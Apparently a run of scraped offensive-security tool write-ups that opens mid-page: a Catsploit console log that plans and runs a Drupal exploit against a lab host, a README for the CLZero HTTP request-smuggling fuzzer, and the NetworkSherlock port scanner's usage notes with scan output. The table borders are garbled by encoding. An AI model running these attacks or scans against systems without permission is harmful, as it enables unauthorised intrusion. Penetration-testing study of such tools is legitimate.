    โ”ƒ hostID โ”ƒ IP โ”ƒ Hostname โ”ƒ Platform โ”ƒ Pwned โ”ƒ
    โ”กโ”โ”โ”โ”โ”โ” โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”ฉ
    โ”‚ attacker โ”‚ 0.0.0.0 โ”‚ kali โ”‚ kali 2022.4 โ”‚ True โ”‚
    โ”‚ h_exbiy6 โ”‚ 192.168.0.10 โ”‚ โ”‚ Linux 3.10 - 4.11 โ”‚ False โ”‚
    โ”‚ h_nhqyfq โ”‚ 192.168.0.20 โ”‚ โ”‚ Microsoft Windows 7 SP1 โ”‚ False โ”‚
    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ด โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜


    catsploit> host detail h_exbiy6
    โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”“
    โ”ƒ hostID โ”ƒ IP โ”ƒ Hostname โ”ƒ Platform โ”ƒ Pwned โ”ƒ
    โ”กโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”ฉ
    โ”‚ h_exbiy6 โ”‚ 192.168.0.10 โ”‚ ubuntu โ”‚ ubuntu 14.04 โ”‚ False โ”‚
    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€ โ”€โ”€โ”€โ”€โ”€โ”˜

    [IP address]
    โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”“
    โ”ƒ ipv4 โ”ƒ ipv4mask โ”ƒ ipv6 โ”ƒ ipv6prefix โ”ƒ
    โ”กโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ฉ
    โ”‚ 192.168.0.10 โ”‚ โ”‚ โ”‚ โ”‚
    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

    [Open ports]
    โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”“
    โ”ƒ ip โ”ƒ proto โ”ƒ port โ”ƒ service โ”ƒ product โ”ƒ version โ”ƒ
    โ”กโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ฉ
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 21 โ”‚ ftp โ”‚ ProFTPD โ”‚ 1.3.5 โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 22 โ”‚ ssh โ”‚ OpenSSH โ”‚ 6.6.1p1 Ubuntu 2ubuntu2.10 โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 80 โ”‚ http โ”‚ Apache httpd โ”‚ 2.4.7 โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 445 โ”‚ netbios-ssn โ”‚ Samba smbd โ”‚ 3.X - 4.X โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 631 โ”‚ ipp โ”‚ CUPS โ”‚ 1.7 โ”‚
    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

    [Vulnerabilities]
    โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”“
    โ”ƒ ip โ”ƒ proto โ”ƒ port โ”ƒ vuln_name โ”ƒ cve โ”ƒ
    โ”กโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ฉ
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 0 โ”‚ TCP Timestamps Information Disclosure โ”‚ N/A โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 21 โ”‚ FTP Unencrypted Cleartext Login โ”‚ N/A โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 22 โ”‚ Weak MAC Algorithm(s) Supported (SSH) โ”‚ N/A โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 22 โ”‚ Weak Encryption Algorithm(s) Supported (SSH) โ”‚ N/A โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 22 โ”‚ Weak Host Key Algorithm(s) (SSH) โ”‚ N/A โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 22 โ”‚ Weak Key Exchange (KEX) Algorithm(s) Supported (SSH) โ”‚ N/A โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 80 โ”‚ Test HTTP dangerous methods โ”‚ N/A โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 80 โ”‚ Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check โ”‚ CVE-2014-3704 โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 80 โ”‚ Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check โ”‚ N/A โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 80 โ”‚ Sensitive File Disclosure (HTTP) โ”‚ N/A โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 80 โ”‚ Unprotected Web App / Device Installers (HTTP) โ”‚ N/A โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 80 โ”‚ Cleartext Transmission of Sensitive Information via HTTP โ”‚ N/A โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 80 โ”‚ jQuery < 1.9.0 XSS Vulnerability โ”‚ CVE-2012-6708 โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 80 โ”‚ jQuery < 1.6.3 XSS Vulnerability โ”‚ CVE-2011-4969 โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 80 โ”‚ Drupal 7.0 Information Disclosure Vulnerability - Active Check โ”‚ CVE-2011-3730 โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 631 โ”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS โ”‚ CVE-2016-2183 โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 631 โ”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS โ”‚ CVE-2016-6329 โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 631 โ”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS โ”‚ CVE-2020-12872 โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 631 โ”‚ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection โ”‚ CVE-2011-3389 โ”‚
    โ”‚ 192.168.0.10 โ”‚ tcp โ”‚ 631 โ”‚ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection โ”‚ CVE-2015-0204 โ”‚
    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

    [Users]
    โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”“
    โ”ƒ user name โ”ƒ group โ”ƒ
    โ”กโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”ฉ
    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜


    catsploit> plan attacker h_exbiy6
    Planning attack scenario...100%
    [*] Done. 15 scenarios was planned.
    [*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
    catsploit> scenario list
    โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ” โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”“
    โ”ƒ scenario id โ”ƒ src host ip โ”ƒ target host ip โ”ƒ eVc โ”ƒ eVd โ”ƒ steps โ”ƒ first attack step โ”ƒ
    โ”กโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”&#947 3;โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ฉ
    โ”‚ 3d3ivc โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 1.0 โ”‚ 32.0 โ”‚ 1 โ”‚ exploit/multi/http/jenkins_sโ€ฆ โ”‚
    โ”‚ 5gnsvh โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 1.0 โ”‚ 53.76 โ”‚ 2 โ”‚ exploit/multi/http/jenkins_sโ€ฆ โ”‚
    โ”‚ 6nlxyc โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 0.0 โ”‚ 48.32 โ”‚ 2 โ”‚ exploit/multi/http/jenkins_sโ€ฆ โ”‚
    โ”‚ 8jos4z โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 0.7 โ”‚ 72.8 โ”‚ 2 โ”‚ exploit/multi/http/jenkins_sโ€ฆ โ”‚
    โ”‚ 8kmmts โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 0.0 โ”‚ 32.0 โ”‚ 1 โ”‚ exploit/multi/elasticsearch/โ€ฆ โ”‚
    โ”‚ agjmma โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 0.0 โ”‚ 24.0 โ”‚ 1 โ”‚ exploit/windows/http/manageeโ€ฆ โ”‚
    โ”‚ joglhf โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 70.0 โ”‚ 60.0 โ”‚ 1 โ”‚ auxiliary/scanner/ssh/ssh_loโ€ฆ โ”‚
    โ”‚ rmgrof โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 100.0 โ”‚ 32.0 โ”‚ 1 โ”‚ exploit/multi/http/drupal_drโ€ฆ โ”‚
    โ”‚ xuowzk โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 0.0 โ”‚ 24.0 โ”‚ 1 โ”‚ exploit/multi/http/struts_dmโ€ฆ โ”‚
    โ”‚ yttv51 โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 0.01 โ”‚ 53.76 โ”‚ 2 โ”‚ exploit/multi/http/jenkins_sโ€ฆ โ”‚
    โ”‚ znv76x โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 0.01 โ”‚ 53.76 โ”‚ 2 โ”‚ exploit/multi/http/jenkins_sโ€ฆ โ”‚
    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

    catsploit> scenario detail rmgrof
    โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”“
    โ”ƒ src host ip โ”ƒ target host ip โ”ƒ eVc โ”ƒ eVd โ”ƒ
    โ”กโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”ฉ
    โ”‚ 0.0.0.0 โ”‚ 192.168.0.10 โ”‚ 100.0 โ”‚ 32.0 โ”‚
    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”˜

    [Steps]
    โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”“
    โ”ƒ # โ”ƒ step โ”ƒ params โ”ƒ
    โ”กโ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ” โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ฉ
    โ”‚ 1 โ”‚ exploit/multi/http/drupal_drupageddon โ”‚ RHOSTS: 192.168.0.10 โ”‚
    โ”‚ โ”‚ โ”‚ LHOST: 192.168.10.100 โ”‚
    โ””โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜


    catsploit> attack rmgrof
    > ~
    > Metasploit Console Log
    > ~
    [+] Attack scenario succeeded!


    catsploit> exit
    Bye.

    Disclaimer

    All information and code is provided solely for educational purposes and/or for testing your own systems.

    Contact

    For any inquiry, please contact the email address as follows:

    catsploit@nk.MitsubishiElectric.co.jp



    CLZero - A Project For Fuzzing HTTP/1.1 CL.0 Request Smuggling Attack Vectors

    By: Zion3R


    A project for fuzzing HTTP/1.1 CL.0 Request Smuggling Attack Vectors.

    About

    Thank you to @albinowax, @defparam and @d3d, without whom this tool would not exist. Inspired by the tool Smuggler; all attack gadgets are adapted from Smuggler and https://portswigger.net/research/how-to-turn-security-research-into-profit

    For more info see: https://moopinger.github.io/blog/fuzzing/clzero/tools/request/smuggling/2023/11/15/Fuzzing-With-CLZero.html


    Usage

    usage: clzero.py [-h] [-url URL] [-file FILE] [-index INDEX] [-verbose] [-no-color] [-resume] [-skipread] [-quiet] [-lb] [-config CONFIG] [-method METHOD]

    CLZero by Moopinger

    optional arguments:
    -h, --help show this help message and exit
    -url URL (-u), Single target URL.
    -file FILE (-f), Files containing multiple targets.
    -index INDEX (-i), Index start point when using a file list. Default is first line.
    -verbose (-v), Enable verbose output.
    -no-color Disable colors in HTTP Status
    -resume Resume scan from last index place.
    -skipread Skip the read response on smuggle requests, recommended. This will save a lot of time between requests. Ideal for targets with standard HTTP traffic.
    -quiet (-q), Disable output. Only successful payloads will be written to ./payloads/
    -lb Last byte sync method for least request latency. Due to the nature of the request, it cannot guarantee that the smuggle request will be processed first. Ideal for targets with a high amount of traffic, and you do not mind sending multiple requests.
    -config CONFIG (-c) Config file to load, see ./configs/ to create custom payloads
    -method METHOD (-m) Method to use when sending the smuggle request. Default: POST

    Single target attack:

    • python3 clzero.py -u https://www.target.com/ -c configs/default.py -skipread

    • python3 clzero.py -u https://www.target.com/ -c configs/default.py -lb

    Multi target attack:

    • python3 clzero.py -f urls.txt -c configs/default.py -skipread

    • python3 clzero.py -f urls.txt -c configs/default.py -lb

    Install

    git clone https://github.com/Moopinger/CLZero.git
    cd CLZero
    pip3 install -r requirements.txt


    NetworkSherlock - Powerful And Flexible Port Scanning Tool With Shodan

    By: Zion3R


    NetworkSherlock is a powerful and flexible port scanning tool designed for network security professionals and penetration testers. With its advanced capabilities, NetworkSherlock can efficiently scan IP ranges, CIDR blocks, and multiple targets. It stands out with its detailed banner grabbing capabilities across various protocols and integration with Shodan, the world's premier service for scanning and analyzing internet-connected devices. This Shodan integration enables NetworkSherlock to provide enhanced scanning capabilities, giving users deeper insights into network vulnerabilities and potential threats. By combining local port scanning with Shodan's extensive database, NetworkSherlock offers a comprehensive tool for identifying and analyzing network security issues.
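    Banner grabbing itself is conceptually simple. A minimal Python sketch (not NetworkSherlock's actual implementation) connects to a TCP port and reads whatever the service volunteers first:

    import socket

    def grab_banner(ip, port, timeout=2.0):
        """Connect to a TCP port and return the service's greeting, if any."""
        try:
            with socket.create_connection((ip, port), timeout=timeout) as sock:
                sock.settimeout(timeout)
                return sock.recv(1024).decode(errors="replace").strip()
        except (socket.timeout, OSError):
            return ""

    print(grab_banner("10.0.2.12", 21))  # e.g. "220 (vsFTPd 2.3.4)"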


    Features

    • Scans multiple IPs, IP ranges, and CIDR blocks.
    • Supports port scanning over TCP and UDP protocols.
    • Detailed banner grabbing feature.
    • Ping check for identifying reachable targets.
    • Multi-threading support for fast scanning operations.
    • Option to save scan results to a file.
    • Provides detailed version information.
    • Colorful console output for better readability.
    • Shodan integration for enhanced scanning capabilities.
    • Configuration file support for Shodan API key.

    Installation

    NetworkSherlock requires Python 3.6 or later.

    1. Clone the repository:
      git clone https://github.com/HalilDeniz/NetworkSherlock.git
    2. Install the required packages:
      pip install -r requirements.txt

    Configuration

    Update the networksherlock.cfg file with your Shodan API key:

    [SHODAN]
    api_key = YOUR_SHODAN_API_KEY

    Usage

    python3 networksherlock.py --help
    usage: networksherlock.py [-h] [-p PORTS] [-t THREADS] [-P {tcp,udp}] [-V] [-s SAVE_RESULTS] [-c] target

    NetworkSherlock: Port Scan Tool

    positional arguments:
    target Target IP address(es), range, or CIDR (e.g., 192.168.1.1, 192.168.1.1-192.168.1.5,
    192.168.1.0/24)

    options:
    -h, --help show this help message and exit
    -p PORTS, --ports PORTS
    Ports to scan (e.g. 1-1024, 21,22,80, or 80)
    -t THREADS, --threads THREADS
    Number of threads to use
    -P {tcp,udp}, --protocol {tcp,udp}
    Protocol to use for scanning
    -V, --version-info Used to get version information
    -s SAVE_RESULTS, --save-results SAVE_RESULTS
    File to save scan results
    -c, --ping-check Perform ping check before scanning
    --use-shodan Enable Shodan integration for additional information

    Basic Parameters

    • target: The target IP address(es), IP range, or CIDR block to scan.
    • -p, --ports: Ports to scan (e.g., 1-1000, 22,80,443).
    • -t, --threads: Number of threads to use.
    • -P, --protocol: Protocol to use for scanning (tcp or udp).
    • -V, --version-info: Obtain version information during banner grabbing.
    • -s, --save-results: Save results to the specified file.
    • -c, --ping-check: Perform a ping check before scanning.
    • --use-shodan: Enable Shodan integration.

    Example Usage

    Basic Port Scan

    Scan a single IP address on default ports:

    python networksherlock.py 192.168.1.1

    Custom Port Range

    Scan an IP address with a custom range of ports:

    python networksherlock.py 192.168.1.1 -p 1-1024

    Multiple IPs and Port Specification

    Scan multiple IP addresses on specific ports:

    python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443

    CIDR Block Scan

    Scan an entire subnet using CIDR notation:

    python networksherlock.py 192.168.1.0/24 -p 80

    Using Multi-Threading

    Perform a scan using multiple threads for faster execution:

    python networksherlock.py 192.168.1.1-192.168.1.5 -p 1-1024 -t 20

    Scanning with Protocol Selection

    Scan using a specific protocol (TCP or UDP):

    python networksherlock.py 192.168.1.1 -p 53 -P udp

    Scan with Shodan

    python networksherlock.py 192.168.1.1 --use-shodan

    Scan Multiple Targets with Shodan

    python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443 -V --use-shodan

    Banner Grabbing and Save Results

    Perform a detailed scan with banner grabbing and save results to a file:

    python networksherlock.py 192.168.1.1 -p 1-1000 -V -s results.txt

    Ping Check Before Scanning

    Scan an IP range after performing a ping check:

    python networksherlock.py 10.0.0.1-10.0.0.255 -c

    Output Example

    $ python3 networksherlock.py 10.0.2.12 -t 25 -V -p 21-6000
    ********************************************
    Scanning target: 10.0.2.12
    Scanning IP : 10.0.2.12
    Ports : 21-6000
    Threads : 25
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
    21 /tcp open telnet 220 (vsFTPd 2.3.4)
    80 /tcp open http HTTP/1.1 200 OK
    139 /tcp open netbios-ssn %SMBr
    25 /tcp open smtp 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
    23 /tcp open smtp #' #'
    445 /tcp open microsoft-ds %SMBr
    514 /tcp open shell
    512 /tcp open exec Where are you?
    1524/tcp open ingreslock root@metasploitable:/#
    2121/tcp open iprop 220 ProFTPD 1.3.1 Server (Debian) [::ffff:10.0.2.12]
    3306/tcp open mysql >
    5900/tcp open unknown RFB 003.003
    53 /tcp open domain
    ---------------------------------------------

    Output Example

    $ python3 networksherlock.py 10.0.2.0/24 -t 10 -V -p 21-1000
    ********************************************
    Scanning target: 10.0.2.1
    Scanning IP : 10.0.2.1
    Ports : 21-1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    53 /tcp open domain
    ********************************************
    Scanning target: 10.0.2.2
    Scanning IP : 10.0.2.2
    Ports : 21-1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    445 /tcp open microsoft-ds
    135 /tcp open epmap
    ********************************************
    Scanning target: 10.0.2.12
    Scanning IP : 10.0.2.12
    Ports : 21-1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    21 /tcp open ftp 220 (vsFTPd 2.3.4)
    22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
    23 /tcp open telnet #'
    80 /tcp open http HTTP/1.1 200 OK
    53 /tcp open kpasswd 464/udpcp
    445 /tcp open domain %SMBr
    3306/tcp open mysql >
    ********************************************
    Scanning target: 10.0.2.20
    Scanning IP : 10.0.2.20
    Ports : 21-1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    22 /tcp open ssh SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9

